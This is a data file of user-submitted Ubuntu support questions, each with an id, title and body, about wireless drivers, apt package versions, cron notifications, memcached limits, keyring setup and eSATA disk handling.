298593	help with wireless internet drivers	i have tried doing all the research and trial and error that i could on my own but with no avail . so can anyone out there help me ? i can not get my broadcom b43 wireless adapter to register with ubuntu . i even tried the steps here , but with no luck . so if someone can help me or at least point me in the right direction i would be grateful . lspci -nn : 00:00.0 ram memory [ 0500 ] : nvidia corporation c51 host bridge [ 10de:02f0 ] ( rev a2 ) 00:00.1 ram memory [ 0500 ] : nvidia corporation c51 memory controller 0 [ 10de:02fa ] ( rev a2 ) 00:00.2 ram memory [ 0500 ] : nvidia corporation c51 memory controller 1 [ 10de:02fe ] ( rev a2 ) 00:00.3 ram memory [ 0500 ] : nvidia corporation c51 memory controller 5 [ 10de:02f8 ] ( rev a2 ) 00:00.4 ram memory [ 0500 ] : nvidia corporation c51 memory controller 4 [ 10de:02f9 ] ( rev a2 ) 00:00.5 ram memory [ 0500 ] : nvidia corporation c51 host bridge [ 10de:02ff ] ( rev a2 ) 00:00.6 ram memory [ 0500 ] : nvidia corporation c51 memory controller 3 [ 10de:027f ] ( rev a2 ) 00:00.7 ram memory [ 0500 ] : nvidia corporation c51 memory controller 2 [ 10de:027e ] ( rev a2 ) 00:02.0 pci bridge [ 0604 ] : nvidia corporation c51 pci express bridge [ 10de:02fc ] ( rev a1 ) 00:03.0 pci bridge [ 0604 ] : nvidia corporation c51 pci express bridge [ 10de:02fd ] ( rev a1 ) 00:05.0 vga compatible controller [ 0300 ] : nvidia corporation c51 [ geforce go 6150 ] [ 10de:0244 ] ( rev a2 ) 00:09.0 ram memory [ 0500 ] : nvidia corporation mcp51 host bridge [ 10de:0270 ] ( rev a2 ) 00:0a.0 isa bridge [ 0601 ] : nvidia corporation mcp51 lpc bridge [ 10de:0260 ] ( rev a3 ) 00:0a.1 smbus [ 0c05 ] : nvidia corporation mcp51 smbus [ 10de:0264 ] ( rev a3 ) 00:0a.3 co-processor [ 0b40 ] : nvidia corporation mcp51 pmu [ 10de:0271 ] ( rev a3 ) 00:0b.0 usb controller [ 0c03 ] : nvidia corporation mcp51 usb controller [ 10de:026d ] ( rev a3 ) 00:0b.1 usb controller [ 0c03 ] : nvidia corporation mcp51 usb controller [ 10de:026e ] ( rev a3 ) 00:0d.0 ide interface [ 0101 ] : nvidia corporation mcp51 ide [ 10de:0265 ] ( rev f1 ) 00:0e.0 ide interface [ 0101 ] : nvidia corporation mcp51 serial ata controller [ 10de:0266 ] ( rev f1 ) 00:10.0 pci bridge [ 0604 ] : nvidia corporation mcp51 pci bridge [ 10de:026f ] ( rev a2 ) 00:10.1 audio device [ 0403 ] : nvidia corporation mcp51 high definition audio [ 10de:026c ] ( rev a2 ) 00:14.0 bridge [ 0680 ] : nvidia corporation mcp51 ethernet controller [ 10de:0269 ] ( rev a3 ) 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration [ 1022:1100 ] 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map [ 1022:1101 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller [ 1022:1102 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control [ 1022:1103 ] 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) 07:05.0 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 ieee 1394 controller [ 1180:0832 ] 07:05.1 sd host controller [ 0805 ] : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter [ 1180:0822 ] ( rev 19 ) 07:05.2 system peripheral [ 0880 ] : ricoh co ltd r5c592 memory stick bus host adapter [ 1180:0592 ] ( rev 0a ) 07:05.3 system peripheral [ 0880 ] : ricoh co ltd xd-picture card controller [ 1180:0852 ] ( rev 05 ) lshw -c network : pci ( sysfs ) scsi *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:19 memory : b3200000-b3203fff rfkill list : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no
298595	`` wakeup '' does n't work	everytime i hit `` apply '' it says `` unable to set all alarms . check time preferences '' whats this ? can someone help fix this ? or if any other alarm clock app exists which wakes the laptop from sleep to ring ?
298600	ubuntu font for arabic and urdu	i have been following ubuntu 's design and my interest is ubuntu 's font . the webpage , http : //font.ubuntu.com/ , seems to be dead and there is n't any progress . is the ubuntu font for arabic and urdu dead ?
298603	could not resolve hostname	i am trying to login to a server using ssh and the console . i have the ubuntu raring ringtail . i get the could not resolve hostname prompt a couple of times and then after some attempts it just works . we have a couple of servers and i have the problem with all of them . no one else at my workplace has this problem . does this point to a problem with hardware i.e . the switch or is this problem known in `` raring ringtail '' . thanks for the help in advance !
298604	desktop screen color has changed	using ubuntu 12.04 lts ( linux ) on an asus x44h series laptop . the color on my monitor has suddenly changed . it is now light green . the desktop wallpaper is very dark green . see attached screen shots . i did not touch any settings and no new software installed . can anyone help me , please ?
298606	download a particular version of a package with apt	i wish to download a particular version of a package . the package in question is ruby1.9.3 which has a ubuntu native version and a brightbox ppa version . i have the ppa version installed and that works great . from apt-cache showpkg ruby1.9.3 : package : ruby1.9.3 versions : 1:1.9.3.392-1bbox1~quantal1 ( /var/lib/dpkg/status ) description language : file : /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_binary-amd64_packages md5 : aa611a7522ee6c493d69294af0dd1d4b description language : en file : /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en md5 : aa611a7522ee6c493d69294af0dd1d4b 1.9.3.194-8.1ubuntu1 ( /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_binary-amd64_packages ) description language : file : /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_binary-amd64_packages md5 : aa611a7522ee6c493d69294af0dd1d4b description language : en file : /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en md5 : aa611a7522ee6c493d69294af0dd1d4b downloading the ubuntu native package is no problem : apt-get source ruby1.9.3=1.9.3.194-8.1ubuntu1 but downloading the other with : $ apt-get source ruby1.9.3=1:1.9.3.392-1bbox1~quantal1 reading package lists ... done building dependency tree reading state information ... done picking 'ruby1.9.1 ' as source package instead of 'ruby1.9.3' e : ignore unavailable version '1:1.9.3.392-1bbox1~quantal1 ' of package 'ruby1.9.3' e : unable to find a source package for ruby1.9.1 does not work . i 'm running 13.04 which i upgraded from 12.10 . the ppa is defined as : deb http : //ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu quantal main deb-src http : //ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu quantal main i 'd like to do this because i want to create a ruby 2.0 package as brightbox is lagging in their releases and i 'd like to figure out how they did it .
298607	application windows randomly blinking ( see video )	applications redraw frantically ( blink white ) for a couple minutes and then it stops . i made a video showing the issue . it is very weird behaviour . what is even strange ( or a clue ? ) is that : if i have a system menu open ( mouse right click menu ) then there is no redraw whatsoever also if i have the unity dash opened then the windows redraw underneath it ! it stops after a couple minutes ( when the notebook heats up ? ) it happens always after boot and after resume from a longer suspend period . everything blinks except the unity side launcher , top status bar and unity dash . i am running : 12.04 fully updated . standard base video driver . tried the flgx but got stuck in 2d mode ( the issue did not happen there ) . logged in gnome and it did n't happen either . dell inspiron with hybrid video ( intel + radeon hd 6400m ) any ideas what it is or how to find a solution ?
298608	notify-send does n't work from crontab	i made a script that should notify me when there 's a new chapter of manga that i 'm reading . i used the command notify-send to do this . the program works when i am trying to run it in terminal . the notification is showing . however , when i placed this in my crontab , the notification does n't show . i 'm pretty sure that the program is running since i made it to create a file for me . the file was created , but the notification did n't show . here 's my script # ! /bin/bash # one piece manga reminder # i created a file named .newop that contains the latest chapter . let new= $ ( cat ~/.newop ) wget -- read-timeout=30 -t20 -o .opreminder.txt http : //www.mangareader.net/103/one-piece.html if ( ( $ ( cat .opreminder.txt | grep `` one piece $ new '' | wc -l ) > =1 ) ) then ( ( new+=1 ) ) echo $ new echo $ new > ~/.newop notify-send `` a new chapter of one piece was released . '' else notify-send `` no new chapter for one piece . '' notify-send `` the latest chapter is still $ new . '' fi exit and here 's what i wrote in my crontab 0,15,30,45 12-23 * * 3 /home/jchester/bin/opreminder.sh
298615	how to increase maximum open files for memcached service	using ulimit -n i am able to set per shell based maximum open files limit to make this value persistent i am able to edit this is in /etc/security/limits.conf and restart the ubuntu 12.10 box , here is the configuration * soft nofile 10240 * hard nofile 10240 root soft nofile 10240 root hard nofile 10240 but the above value is not getting applied to memcached service , how to make `` max open files 10240 '' to memcached service . even after setting limits.conf the memcached is still showing xx @ xx : ~ $ ps aux|grep mem mysql 2044 0.0 0.0 327436 1260 ? sl 17:09 0:00 /usr/bin/memcached -vv -m 256 -p 11211 -u mysql -l 0.0.0.0 xx @ xx : ~ $ cat /proc/2044/limits limit soft limit hard limit units max cpu time unlimited unlimited seconds max file size unlimited unlimited bytes max data size unlimited unlimited bytes max stack size 8388608 unlimited bytes max core file size 0 unlimited bytes max resident set unlimited unlimited bytes max processes 30402 30402 processes max open files 1024 1024 files max locked memory 65536 65536 bytes max address space unlimited unlimited bytes max file locks unlimited unlimited locks max pending signals 30402 30402 signals max msgqueue size 819200 819200 bytes max nice priority 0 0 max realtime priority 0 0 max realtime timeout unlimited unlimited us please let me know how to increase `` max open files '' for memcached service
298628	removing old lxc directory `` operation not permitted ''	i setup some lxc containers ( raring ) under a /data path to get them off my ssd and i thought they were corrupt so tried to just rm -rf /data/lxc/ $ name and it clears out all except the rootfs directory . it fails with the error : sudo rm -rf /data/lxc/ $ lxcname rm : can not remove ‘/data/lxc/ $ lxcname/rootfs’ : operation not permitted any hints on how i can clear this now empty directory would be appreciated .
298635	recover files from windows	i recently replaced my operating system windows 7 with ubuntu 12.04 and forgot to backup a few family pictures . and i was wondering if it 's possible to retrieve them , and if how ?
298636	availability of packages on ubuntu lts	how can i know what packages are available for the ubuntu lts . my host says that php 5.4 is not supported because it is currently not available on the lts repo for ubuntu 12.04 . how can i find out if it exists or not ? is there a webpage that i can use to search the availability of a package for the lts
298638	how to pass text file contents as argument to console application ?	what is the command line to run a console application with input argument fed from text file ? text_file : this is a simple text file with characters and other symbols including tabs and new lines the console should get $ ./myapp `` this is a simple text file with characters and other symbols including tabs and new lines ''
298645	how can see find process that have pages swapped out ?	i would like to know which processes have pages swapped out . htop only show virtual memory which may or may not be paged out . are there any tool that are more refined than this ?
298652	no sound on speakers hp dv6000	i have no sound from my speakers with ubuntu 12.04.2 . ( here 's where stuff gets weird ) i have sound with my headphones but they only work when halfway plugged in . the headphone jack has no problem when booting from my windows xp partition . at least i can get sound at all . i still have no sound from my speakers . any help ?
298655	lenovo l430 malefunction brightness control 13.04	i use a lenovo l430 . unfortunately after updating to 13.04 the brightness control does not work any more . hitting fn + f8/f9 the popup appears but it is changing only one step but the brightness remains . hitting once more the control remains in its position . has anybody an idea ? thank you !
298663	virtualbox headless : unable to create hostonly network	i am trying to create vm with the one bridged interface and one hostonly interface , but i keep getting an error as the i am not able to attach a device to the hostonly nic . i have done this : # vboxmanage hostonlyif create # vboxmanage hostonlyif ipconfig vboxnet0 -- ip 10.0.0.10 -- netmask 255.255.255.0 # vboxmanage createvm -- name `` centos604 '' -- register -- basefolder /vboxes # vboxmanage modifyvm `` centos604 '' -- memory 512 -- acpi on -- boot1 dvd -- nic1 bridged -- bridgeadapter1 eth0 -- nic2 hostonly -- hostonlyadapter1 vboxnet0 -- ostype redhat_64 # vboxmanage createvdi -- filename /vboxes/centos604hdd.vdi -- size 10000 # vboxmanage storagectl `` centos604 '' -- name `` ide controller '' -- add ide '' # vboxmanage storageattach `` centos604 '' -- storagectl `` ide controller '' -- port 0 -- device 0 -- type hdd -- medium /vboxes/centos604hdd.vdi # vboxmanage storageattach `` centos604 '' -- storagectl `` ide controller '' -- port 1 -- device 0 -- type dvddrive -- medium centos-6.4-x86_64-minimal.iso # vboxmanage startvm # vboxmanage startvm `` centos604 '' -- type headless waiting for vm `` centos604 '' to power on ... vboxmanage : error : nonexistent host networking interface , name '' ( verr_internal_error ) vboxmanage : error : details : code ns_error_failure ( 0x80004005 ) , component console , interface iconsole and here is the output of my ip : # ip addr show vboxnet0 15 : vboxnet0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 0a:00:27:00:00:00 brd ff : ff : ff : ff : ff : ff inet 10.0.0.10/24 brd 10.0.0.255 scope global vboxnet0 inet6 fe80 : :800:27ff : fe00:0/64 scope link valid_lft forever preferred_lft forever this is my error : nonexistent host networking interface , name
298665	upstart : report ( email , log ) on respawn and failure	i would like to get an email when an upstart job fails and respawns , and when all respawns are depleted , and the job fails . how can i do that ?
298670	why is rc.local in /etc , should it be owned by root , and when is it run ?	my understanding of rc.local , based on a quick google search , is that i can put some bash in it which will be run at the beginning of [ something ] ( what , user login , system start up ? ) . the rc.local in my ubuntu 12.04.2 server is owned by my user , orokusaki , vs being owned by root . because it 's in /etc , i 'm guessing it 's more of a global thing vs a user-specific thing . is this true ? if so , why did ubuntu create it with my orokusaki user , but then put it in etc ? should i chown root : root /etc/rc.local to fix it , or should i move it into my home directory ?
298678	i ca n't install gnome-shell and edubuntu secondary bundle for ubuntu	i tryed to install gnome-shell and edubuntu secondary bundle for ubuntu but in place of showing install it shows `` available from the 'universe ' source '' . please tell how to install .
298681	apt-get autoremove does n't accept regular expressions ?	running apt-get install libboost . *1.40.0 ( ubuntu 10.04.4 ) works perfectly . but apt-get autoremove libboost.*1.40.0 ... not so much . any workaround ? reading package lists ... done building dependency tree reading state information ... done note , selecting libboost-system1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-python1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-signals1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-program-options1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-date-time1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-test1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-iostreams1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-wave1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-graph1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-thread1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-serialization1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-math1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-regex1.40.0 for regex 'libboost . *1.40.0' note , selecting libboost-filesystem1.40.0 for regex 'libboost . *1.40.0' e : could n't find package libboost . *1.40.0 edit : in fact this has nothing to do with autoremove , even remove will do the same ~ # apt-get remove libboost- [ a-z ] *1.40.0 reading package lists ... done building dependency tree reading state information ... done note , selecting libboost-system1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-python1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-signals1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-test1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-iostreams1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-wave1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-graph1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-thread1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-serialization1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-math1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-regex1.40.0 for regex 'libboost- [ a-z ] *1.40.0' note , selecting libboost-filesystem1.40.0 for regex 'libboost- [ a-z ] *1.40.0' e : could n't find package libboost- [ a-z ] *1.40.0
298682	backing up with deja dup to multiple hard drives	i 'd like to backup 3 hard drives into 2 . problem is , that i have no clue how to configure deja dup so that it would compress the files that it fits . fyi the 3 hard drives i was talking about are internal , as well as one of the drives is internal but since there is no space left , the last one has to be external . the best way would be that only the internal one is to be backed up on . please help me with this matter i 'd appreciate if you would answer fast .
298686	ubuntu 13.04 running very slow	i just installed ubuntu 13.04 64 . the hd was clean and nothing was on it when i did the install . i have windows 7 installed on another drive and it runs smooth . the problem i 'm having is it is running very slow , freezing on me and taking a few minutes to load . i had 12.04 on the same comp and it ran fine . memory -2.0 gib processor - amd athlon 64 processor 3700+ disk - 115.9 gb graphics - gforce 7900gt 256bit nvidia
298689	i ca n't get `` apt-get install php5-suhosin '' to work	i am running ubuntu 13.04 . i can not get my php website to work because i can not install php5-suhosin . it said this each time that i have tried apt-get install php5-suhosin : package php5-suhosin is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source i 've already done apt-get update and apt-get upgrade . i also can not seem to install it with compiling either . please help ! thank you ! ^^outdated^^ new problem below ! reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5-suhosin : depends : phpapi-20090626 e : unable to correct problems , you have held broken packages .
298692	systemd is installed on ubuntu raring ?	systemd appears to be installed in ubuntu raring . what does it provide that upstart does n't provide ? why is it there ? i thought ubuntu was keeping upstart .
298693	problems installing awus036h on ubuntu 12.04 in virtualbox	i 'm trying to get my alfa awus036h wireless card to work inside my virtualbox , the drivers installed fine , and ubuntu sees the usb wireless card but i ca n't get it to connect : here 's my kernel version : linux precise64 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux i downloaded the drivers from the alfa site ( rtl8187l_linux_1041 [ 1 ] .0209.2012.tar.gz ) , extracted them into my home directory , and then ran make and sudo make install . i then restarted my box . after restarting i run sudo modprobe rtl8187 and get no errors . lsusb shows : bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0bda:8187 realtek semiconductor corp. rtl8187 wireless adapter i run dmesg | grep 8187 and get : [ 56.360273 ] usbcore : registered new interface driver rtl8187 [ 77.728938 ] linux kernel driver for rtl8187l based wlan cards [ 77.728948 ] rtl8187l : initializing module [ 77.728953 ] rtl8187l : wireless extensions version 22 [ 77.728958 ] rtl8187l : initializing proc filesystem [ 77.729019 ] usbcore : registered new interface driver rtl8187l when i run ifconfig i do n't see it though : eth0 link encap : ethernet hwaddr 08:00:27 : fe : aa : af inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fefe : aaaf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:731 errors:0 dropped:0 overruns:0 frame:0 tx packets:478 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:66075 ( 66.0 kb ) tx bytes:65327 ( 65.3 kb ) eth1 link encap : ethernet hwaddr 08:00:27 : d7:47 : b4 inet addr:33.33.33.10 bcast:33.33.33.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fed7:47b4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:26 errors:0 dropped:0 overruns:0 frame:0 tx packets:7 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8219 ( 8.2 kb ) tx bytes:578 ( 578.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:256 errors:0 dropped:0 overruns:0 frame:0 tx packets:256 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20400 ( 20.4 kb ) tx bytes:20400 ( 20.4 kb ) output of sudo lshw -c network as well : eth0 link encap : ethernet hwaddr 08:00:27 : fe : aa : af inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fefe : aaaf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:731 errors:0 dropped:0 overruns:0 frame:0 tx packets:478 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:66075 ( 66.0 kb ) tx bytes:65327 ( 65.3 kb ) eth1 link encap : ethernet hwaddr 08:00:27 : d7:47 : b4 inet addr:33.33.33.10 bcast:33.33.33.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fed7:47b4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:26 errors:0 dropped:0 overruns:0 frame:0 tx packets:7 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8219 ( 8.2 kb ) tx bytes:578 ( 578.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:256 errors:0 dropped:0 overruns:0 frame:0 tx packets:256 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20400 ( 20.4 kb ) tx bytes:20400 ( 20.4 kb ) the readme file in the driver package asks me to run wlan0up , so i go into where i extracted it , and run sudo ./wlan0up and i get : insmod : error inserting 'r8187l.ko ' : -1 file exists wlan0 : error while getting interface flags : no such device i 've read in other posts that i should be blacklisting some other drivers , but in my case nothing even shows up on wlan0 . other guides have asked me to run ip link set dev wlan0 up which gives me : can not find device `` wlan0 '' at this point i 'm not sure what else i can check , any help would be appreciated .
298696	request to be able to zoom in and out of pictures in ubuntu	currently in ubuntu there is no radio dial to be able to enlarge and reduce the size of pictures when viewed in the file manager or after being queued in the dash . can this improvement be implemented ?
298697	installing ubuntu - stuck at extracting	i am trying to install ubuntu on my netbook . i already have windows xp and i am using the windows installer to install ubutu 12.04 lts . while installing , it successfully downloads the files ( takes about 15 minutes or so ) but when extracting at the end , ut gets stuck at the halfway stage . i tried this on another netbbok with xp and exactly the same problem . anyhelp ? or any alternative ? i am installing ubuntu because that is the only thing i know . if there is any alternative , i would loveto hear .
298702	brightness setting in lenov thinkpad edge e530 after update to kernel 3.8 not working	i used to run dream studio unity ( ivy bridge version ) on sandy bridge on thinkpad edge e530 ( b960 proc . ) , which worked ok , but after it updated itself to kernel 3.8 no more enables to set display brightness correctly - only maybe 0.5 step ( displayed on-screen ) or zero ( really ) from minimum ( not great for e.g . photography ... ) , while hardware continues to work correctly with 3.5-kernel-32-bit artistx 1.4 . i am now trying success with yet newer 64-bit ubuntu studio from april 2013 , but precisely the same bug haunts this version also ( 3.8.0-19-lowlatency # 13-ubuntu smp preempt thu apr 18 09:41:59 utc 2013 x86_64 x86_64 x86_64 gnu/linux ) . what should i do best now ? if i installed manually some additional sw to basic ubuntu 12.04.2lts or 12.10 ( or installed originally 3.2-kernel version dream studio unity ) , which one will stay with 3.5 or lower kernel without intervention for at least 5-6 months ? is there probability the bug will present itself even so ?
298704	why 'xdg-open google-chrome ' wont work ?	when i type google-chrome in the terminal it works . xdg-open google-chrome does n't . why is this so ? i need to do this so that i can run chrome without keeping the terminal open , which xdg-open google-chrome allows me to do .
298708	how do i switch between keyboard layouts ?	i want to switch between english and another language . i have tried lubuntu and it was easy , i figured it out from the friendly menus . but in ubuntu everything is so cryptic .
298711	how to open sd card from terminal ?	i 'm trying to open my sd memorycard , but it does n't show up when plugged in . though it is detected when i look at the usb-devices lsusb and then i get : bus 001 device 002 : id 0ac8 : c33e z-star microelectronics corp . bus 002 device 010 : id 058f:6335 alcor micro corp. sd/mmc card reader bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub how do i open this now ? or how do i make it show up next time i insert the card ?
298713	using gnome-keyring with svn via ssh and mysql-workbench	problem : mysql-workbench fails to connect to the keyring to connect to mysql . i 'm trying to get my svn command ( which uses an svn+ssh uri ) to prompt me to enter my password for my local rsa secrets . basically , i connected via ssh to the server which hosts svn , and copied over my public key into the .ssh folder in the authorized_keys2 file . my rsa id is protected by a password so that after i login , i still need to enter the rsa password to connect to the other machine . ( forgive me if my terminology is n't correct ) . this works great . now , i can also run ssh-add to enter my password once the entire time i 'm logged in . this works fabulous too . i realize that i never remember to run ssh-add before i run 'svn update ' , so i get the idea from websearches that i could use the keyring to automatcially pop up a dialog box whenever i do a subversion update . so , i add the following to my .profile : # add ssh to the gnome keyring components eval $ ( /usr/bin/gnome-keyring-daemon -- start -- components=ssh ) export ssh_auth_sock once i do this , i see that the ssh-agent is still set in my environment variables . so , i use xfconf-query to set the xfce4-session parameter of /startup/ssh-agent/enabled to false . great , now my environment variable for the ssh_auth_sock is using the keyring . but ... mysql-workbench can no longer access the keyring to log in and perform queries . when i remove the eval and export from my .profile , then mysql-workbench works . when i run the commands manually , mysql-workbench still works , and so does the keyring popup on my svn . how do i get both the mysql-workbench and svn 's ssh request to use the keyring with startup options ? ( ie what n00bie mistake am i making in my attempts to make the gnome-keyring work ? ) i also tried editng the /etc/xdg/autostart/gnome-keyring-ssh.desktop to 'onlyshowin=gnome ; unity ; xfce ; ' , but that had no apparent affect . xubuntu : 12.04 xfce : 4.8 mysql workbench : 5.2.38 openssh : 5.9p1 gnome-keyring : 3.2.2
298714	does ubuntu still brick certain devices ?	i read previously on other threads that installing ubuntu on some newer machines can cause the problems with the bios , where 'ubuntu ' will write over the bios , and cause the machine to end up being a brick . how do i know if i 'm safe ?
298715	how do i mount my samsung galaxy ace phone ( usb connected ) ?	i attached a samsung galaxy ace mobile phone using a data cable . here is the output of dmesg : [ 1644.813452 ] scsi 9:0:0:0 : direct-access samsung gt-s5830 card 0100 pq : 0 ansi : 2 [ 1644.815236 ] sd 9:0:0:0 : attached scsi generic sg2 type 0 [ 1644.820822 ] sd 9:0:0:0 : [ sdb ] attached scsi removable disk [ 1683.927497 ] sgi xfs with acls , security attributes , realtime , large block/inode numbers , no debug enabled [ 1683.930666 ] sgi xfs quota management subsystem [ 1683.941496 ] jfs : ntxblock = 8192 , ntxlock = 65536 [ 1726.272098 ] ce : hpet increased min_delta_ns to 20113 nsec i did some surfing and download the ntfs driver . i used pmount command as pmount /dev/sdb .but did n't get any result . previously i was using ubuntu maverick and in that no such issue was there . why does this brake after upgrading the os ?
298720	will be something deleted if i upgrade from ubuntu 12.10 to 13.04 ?	i want to upgrade to 13.04 but i dont know if something will be deleted ...
298721	how do i enable the official java plugin in the latest version of google chrome ?	i was using chromium , which runs smoothly , and was forced to upgrade to chrome ( mega.co.nz obliged me to ) . now i ca n't execute applets in chrome . checking the installed plugins in both browsers , i see that chromium has both icedtea7 and java whereas chrome has only icedtea7 plugin . so i have a potential culprit but do n't know how to enable the java plugin on chrome . any suggestions ? thank you .
298722	no upper right icons with ubuntu 12.10 and lightdm	i have a ubuntu 12.10 server running in which i have installed lightdm . now lightdm can boot and i can log in , but when i see the screen , i do n't see any top right icon . so i can not logout i can not do anything . see screenshot : my video card is : `` vga compatible controller : matrox electronics systems ltd. mga g200ew wpcm450 ( rev 0a ) '' . from what i can see , it does n't allow one to have a bigger screen than 1024 * 768 . i do n't care about this because it is a server ... still , i care that i can not see the icons . just to be sure it was not a screen resolution problem i run `` sudo dpkg-reconfigure -phigh xserver-xorg '' but the problem persists ... any ideas ? thanks in advance !
298723	stop/switch esata hotpluggable disk	i would like to know what would be the best practices to start/stop/switch safely an esata disk . first : i 've read this post : safely removing esata disks but the given and accepted answer does not work for me . at first i wanted to ask for clarifications , but i 've read this is to be avoided , so my only option was to open another question . i 'm running kubuntu 13.04 . my bios does support ahci and i have specifically enables hotplug for the sata port that links to my esata bay . my esata dock has a power button . starting seems easy enough . if i plug a disk in the bay , then power it up , the disk will mount automatically as a `` fuseblk '' disk ( at least for the one i tested , looks like it 's how an ntfs disk is reported ) however , i would like to know how i can stop the disk without stoping the computer , possibly to mount another disk , all of this while avoiding data loss and physical disk damage , and preferably in an ( semi ) automated way so i do n't have to open my command line every time . what i 've found so far : sdparm does n't seem to be of any use , even thought it should be the right tool ( disk is /dev/sda ) , but sdparm -c stop does nothing hdparm on the other hand does work to put the disk to sleep sudo hdparm -y /dev/sda will have the disk stop spinning . however , the disk is still mounted as reported by mount -l sudo echo 1 > /sys/block/sda/device/delete will give me a permission refused error ( even though i used sudo ) there is an `` eject '' icon if i right click the disk in dolphin that will unmount the disk , but the disk wo n't stop spinning ( and i sure do n't want to physically remove a spinning disk ) so currently , i unmount the disk using the `` eject '' button , then put the disk to sleep . however , i do n't know enough of the hds management to be sure `` sleep '' is enough . is there no real `` stop '' or `` power off '' command ? when the os is going to shutdown , does it simply put the drives to sleep and is it enough to allow safe handling . also , when following those steps and then switching to another disk , the disk will sometimes appear as /dev/sde rather than /dev/sda , wich leads me to believe there are some resources that are not correctly freed . maybe this is precisely the point of the sudo echo 1 > /sys/block/sda/device/delete command , but as i ca n't run it , even with a sudo , it 's not really helpful . is there any other command i should be aware of , and add to the sequence ? as for making this automatic , i guess i can make a shell script , but what if i have a multi partition disk . using umount /dev/sda1 wo n't unmount other partitions , and i do n't think it 's possible to unmount using only /dev/sda is it ? would it work with /dev/sda* ? currently the only multi partition disk i have under hand is my system disk , so i ca n't try to unmount it and see what happens .
